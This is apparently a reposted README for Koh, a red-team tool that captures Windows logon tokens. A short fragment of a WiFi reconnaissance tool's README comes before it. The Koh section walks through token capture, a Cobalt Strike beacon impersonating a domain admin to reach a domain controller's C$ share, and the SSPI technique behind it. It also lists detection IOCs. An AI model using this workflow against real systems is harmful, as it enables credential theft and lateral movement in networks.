[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop command when the module is running:

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.



Koh - The Token Stealer

18 July 2022 at 12:30
By: Zion3R


Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.

Some code was inspired by Elad Shamir's Internal-Monologue project (no license), as well as KB180548. For why this is possible and Koh's approeach, see the Technical Background section of this README.

For a deeper explanation of the motivation behind Koh and its approach, see the Koh: The Token Stealer post.

@harmj0y is the primary author of this code base. @tifkin_ helped with the approach, BOF implementation, and some token mechanics.

Koh is licensed under the BSD 3-Clause license.


Koh Server

The Koh "server" captures tokens and uses named pipes for control/communication. This can be wrapped in Donut and injected into any high-integrity SYSTEM process (see The Inline Shenanigans Bug).

Compilation

We are not planning on releasing binaries for Koh, so you will have to compile yourself :)

Koh has been built against .NET 4.7.2 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build. The Koh.exe assembly and Koh.bin Donut-built PIC will be output to the main directory. The Donut blob is both x86/x64 compatible, and is built with the following options using v0.9.3 of Donut at ./Misc/Donut.exe:

  [ Instance type : Embedded
[ Entropy : Random names + Encryption
[ Compressed : Xpress Huffman
[ File type : .NET EXE
[ Parameters : capture
[ Target CPU : x86+amd64
[ AMSI/WDLP : abort

Donut's license is BSD 3-clause.

Usage

Koh.exe Koh.exe <list | monitor | capture> [GroupSID... GroupSID2 ...]

  • list - lists (non-network) logon sessions
  • monitor - monitors for new/unique (non-network) logon sessions
  • capture - captures one unique token per SID found for new (non-network) logon sessions

Group SIDs can be supplied command line as well, causing Koh to monitor/capture only logon sessions that contain the specified group SIDs in their negotiated token information.

Example - Listing Logon Sessions

C:\Temp>Koh.exe list

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: list

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Origin LUID : 1677733 (0x1999a5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Example - Monitoring for Logon Sessions (with group SID filtering)

Only lists results that have the domain admins (-512) group SID in their token information:

C:\Temp>Koh.exe monitor S-1-5-21-937929760-3187473010-80948926-512

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: monitor

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM

[*] Targeting group SIDs:
S-1-5-21-937929760-3187473010-80948926-512

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492608
Lo gonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Koh Client

The current usable client is a Beacon Object File at .\Clients\BOF\. Load the .\Clients\BOF\KohClient.cna aggressor script in your Cobalt Strike client to enable BOF control of the Koh server. The only requirement for using captured tokens is SeImpersonatePrivilege. The communication named pipe has an "Everyone" DACL but uses a basic shared password (super securez).

To compile fresh on Linux using Mingw, see the .\Clients\BOF\build.sh script. The only requirement (on Debian at least) should be apt-get install gcc-mingw-w64

Usage

beacon> help koh
koh list - lists captured tokens
koh groups LUID - lists the group SIDs for a captured token
koh filter list - lists the group SIDs used for capture filtering
koh filter add SID - adds a group SID for capture filtering
koh filter remove SID - removes a group SID from capture filtering
koh filter reset - resets the SID group capture filter
koh impersonate LUID - impersonates the captured token with the give LUID
koh release all - releases all captured tokens
koh release LUID - releases the captured token for the specified LUID
koh exit - signals the Koh server to exit

Group SID Filtering

The koh filter add S-1-5-21-<DOMAIN>-<RID> command will only capture tokens that contain the supplied group SID. This command can be run multiple times to add additional SIDs for capture. This can help prevent possible stability issues due to a large number of token leaks.

Example - Capture

"Captures" logon sessions by negotiating usable tokens for each new session.

Server:

C:\Temp>Koh.exe capture

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: capture

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Credential UserName : [email protected]
Origin LUID : 1677733 (0x1999a5)

[*] Successfully negotiated a token for LUID 207990196 (hToken: 848)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Credential UserName : [email protected]
Origin LUID : 1677765 (0x1999c5)

[*] Successfully negotiated a token for LUID 81492692 (hToken: 976)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Credential UserName : [email protected]
Origin LUID : 999 (0x3e7)

[*] Successfully negotiated a token for LUID 1677733 (hToken: 980)

BOF client:

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Access is denied.

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> koh list
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:

Username : THESHIRE\localadmin (S-1-5-21-937929760-3187473010-80948926-1000)
LUID : 67556826
CaptureTime : 6/21/2022 1:24:42 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : [email protected]
Origin LUID : 1676720

Username : THESHIRE\da (S-1-5-21-937929760-3187473010-80948926-1145)
LUID : 67568439
CaptureTime : 6/21/2022 1:24:50 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : [email protected]
Origin LUID : 1677765

Username : THESHIRE\harmj0y (S-1-5-21-937929760-3187473010-80948926-1104)
LUID : 1677733
CaptureTime : 6/21/2022 1:23:10 PM
LogonType : Interactive
AuthPackage : Kerberos
CredUserName : [email protected]
Origin LUID : 999

beacon> koh groups 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
S-1-5-21-937929760-3187473010-80948926-513
S-1-5-21-937929760-3187473010-80948926-512
S-1-5-21-937929760-3187473010-80948926-525
S-1-5-21-937929760-3187473010-80948926-572

beacon> koh impersonate 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
[*] Enabled SeImpersonatePrivilege

[+] received output:
[*] Creating impersonation named pipe: \\.\pipe\imposingcost

[+] received output:
[*] Impersonation succeeded. Duplicating token.

[+] received output:
[*] Impersonated token successfully duplicated.

[+] Impersonated THESHIRE\da

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are THESHIRE\DA (admin)

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Volume in drive \\dc.theshire.local\C$ has no label.
Volume Serial Number is A4FF-7240

Directory of \\dc.theshire.local\C$

01/04/2021 11:43 AM <DIR> inetpub
05/30/2019 03:08 PM <DIR> Pe rfLogs
05/18/2022 01:27 PM <DIR> Program Files
04/15/2021 09:44 AM <DIR> Program Files (x86)
03/20/2020 12:28 PM <DIR> RBFG
10/20/2021 01:14 PM <DIR> Temp
05/23/2022 06:30 PM <DIR> tools
03/11/2022 04:10 PM <DIR> Users
06/21/2022 01:30 PM <DIR> Windows
0 File(s) 0 bytes
9 Dir(s) 40,504,201,216 bytes free

Technical Background

When a new logon session is estabslished on a system, a new token for the logon session is created by LSASS using the NtCreateToken() API call and returned by the caller of LsaLogonUser(). This increases the ReferenceCount field of the logon session kernel structure. When this ReferenceCount reaches 0, the logon session is destroyed. Because of the information described in the Why This Is Possible section, Windows systems will NOT release a logon session if a token handle still exists to it (and therefore the reference count != 0).

So if we can get a handle to a newly created logon session via a token, we can keep that logon session open and later impersonate that token to utilize any cached credentials it contains.

Why This Is Possible

According to this post by a Microsoft engineer:

After MS16-111, when security tokens are leaked, the logon sessions associated with those security tokens also remain on the system until all associated tokens are closed... even after the user has logged off the system. If the tokens associated with a given logon session are never released, then the system now also has a permanent logon session leak as well.

MS16-111 was applied back to Windows 7/Server 2008, so this approach should be effective for everything except Server 2003 systems.

Approach

Enumerating logon sessions is easy (from an elevated context) through the use of the LsaEnumerateLogonSessions() Win32 API. What is more difficult is taking a specific logon session identifier (LUID) and somehow getting a usable token linked to that session.

Possible Approaches

We brainstormed a few ways to a) hold open logon sessions and b) abuse this for token impersonation/use of cached credentials.

  1. The first approach was to use NtCreateToken() which allows you to specify a logon session ID (LUID) to create a new token.
    • Unfortunately, you need SeCreateTokenPrivilege which is traditionally only held by LSASS, meaning you need to steal LSASS' token which isn't ideal.
    • One possibility was to add SeCreateTokenPrivilege to NT AUTHORITY\SYSTEM via LSA policy modification, but this would need a reboot/new logon session to express the new user rights.
  2. You can also focus on just RemoteInteractive logon sessions by using WTSQueryUserToken() to get tokens for new desktop sessions to clone.
    • This is the approach apparently demonstrated by Ryan.
    • Unfortunately this misses newly created local sessions and incoming sessions created from things like PSEXEC.
  3. On a new logon session, open up a handle to every reachable process and enumerate all existing handles, cloning the token linked to the new logon session.
    • This requires opening up lots of processes/handles, which looks very suspicious.
  4. The AcquireCredentialsHandle()/InitializeSecurityContext()/AcceptSecurityContext() approach described below, which is what we went with.

Our Approach

The SSPI AcquireCredentialsHandle() call has a pvLogonID field which states:

A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. 

Note: In order to utilize a logon session LUID with AcquireCredentialsHandle() you need SeTcbPrivilege, however this is usually easier to get than SeCreateTokenPrivilege.

Using this call while specifying a logon session ID/LUID appears to increase the ReferenceCount for the logon session structure, preventing it from being released. However, we're not presented with another problem: given a "leaked"/held open logon session, how do we get a usable token from it? WTSQueryUserToken() only works with desktop sessions, and there's no userland API that we could find that lets you map a LUID to a usable token.

However we can use two additional SSPI functions, InitializeSecurityContext() and AcceptSecurityContext() to act as client and server to ourselves, negotiating a new security context that we can then use with QuerySecurityContextToken() to get a usable token. This was documented in KB180548 (mirrored by PKISolutions here) for the purposes of credential validation. This is a similar approach to Internal-Monologue, except we are completing the entire handshake process, producing a token, and then holding that for later use.

Filtering can then be done on the token itself, via CheckTokenMembership() or GetTokenInformation(). For example, we could release any tokens except for ones belonging to domain admins, or specific groups we want to target.

Advantages/Disadvantages Versus Traditional Credential Extraction

Advantages

  • Works for both local and inbound (non-network) logons.
  • Works for inbound sessions created via Kerberos and NTLM.
  • Doesn’t require opening up a handle to multiple processes.
  • Doesn't create a new logon event or logon session.
  • Doesn't create additional event logs on the DC outside of normal system ticket renewal behavior (I don't think?)
  • No default lifetime on the tokens (I don't think?) so access should work as long as the captured account’s credentials don't change and the system doesn’t reboot.
  • Reuses legitimate captured auth on a system, so should "blend with the noise" reasonably well.

Disadvantages

  • Access is only usable as long as the system doesn't reboot.
  • Doesn't let you reuse access on other systems
    • However, and existing ticket/credential extraction can still be done on the leaked logon session.
  • May cause instability if a large number of sessions are leaked (though this can be mitigated with token group SID filtering) and restricting the maximum number of captured tokens (default of 1000 here).

The Inline Shenanigans Bug

I've been coding for a decent amount of time. This is one of the weirder and frustrating-to-track-down bugs I've hit in a while - please help me with this lol.

  • When the Koh.exe assembly is run from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run via Cobalt Strike's Beacon fork&run process with execute-assembly from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in a SYSTEM context, everything works properly.

  • However If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in an elevated, but not SYSTEM, context, the call to AcquireCredentialsHandle() fails with SEC_E_NO_CREDENTIALS and everything fails Β―\_(ツ)_/Β―

We have tried (with no success):

  • Spinning off everything to a separate thread, specifying a STA thread apartment.
  • Trying to diagnose RPC weirdness (still more to investigate here).
  • Using DuplicateTokenEx and SetThreadToken instead of ImpersonateLoggedOnUser.
  • Checking if we have the proper SeTcbPrivilege right before the AcquireCredentialsHandle call (we do).

For all intents and purposes, the thread context right before the call to AcquireCredentialsHandle works in this context, but the result errors out. And we have no idea why.

If you have an idea of what this might be, please let us know! And if you want to try playing around with a simpler assembly, check out the AcquireCredentialsHandle repo on my GitHub for troubleshooting.

IOCs

To quote @tifkin_ "Everything is stealthy until someone is looking for it." While Koh's approach is slightly different than others, there are still IOCs that can be used to detect it.

The unique TypeLib GUID for the C# Koh collector is 4d5350c8-7f8c-47cf-8cde-c752018af17e as detailed in the Koh.yar Yara rule in this repo. If this is not changed on compilation, it should be a very high fidelity indicator of the Koh server.

When the Koh server starts is opens up a named pipe called \\.\pipe\imposecost that stays open as long as Koh is running. The default password used for Koh communication is password, so sending password list to any \\.\pipe\imposecost pipe will let you confirm if Koh is indeed running. The default impersonation pipe used is \\.pipe\imposingcost.

If Koh starts in an elevated context but not as SYSTEM, a handle/token clone of winlogon is performed to perform a getsystem type elevation.

I'm sure that no attackers will change the indicators mentioned above.

There are likely some RPC artifacts for the token capture that we're hoping to investigate. We will update this section of the README if we find any additional detection artifacts along these lines. Hooking of some of the possibly-uncommon APIs used by Koh (LsaEnumerateLogonSessions or the specific AcquireCredentialsHandle/InitializeSecurityContext/AcceptSecurityContext, specifically using a LUID in AcquireCredentialsHandle) could be explored for effectiveness, but alas, I am not an EDR.

TODO

  • Additional testing in the lab and field. Possible concerns:
    • Stability in production environments, specifically intentional token leakage causing issues on highly-trafficked servers
    • Total actual effective token lifetime
  • "Remote" client that allows for monitoring through the Koh named pipe remotely
  • Implement more clients (PowerShell, C#, C++, etc.)
  • Fix the Inline Shenanigans Bug


❌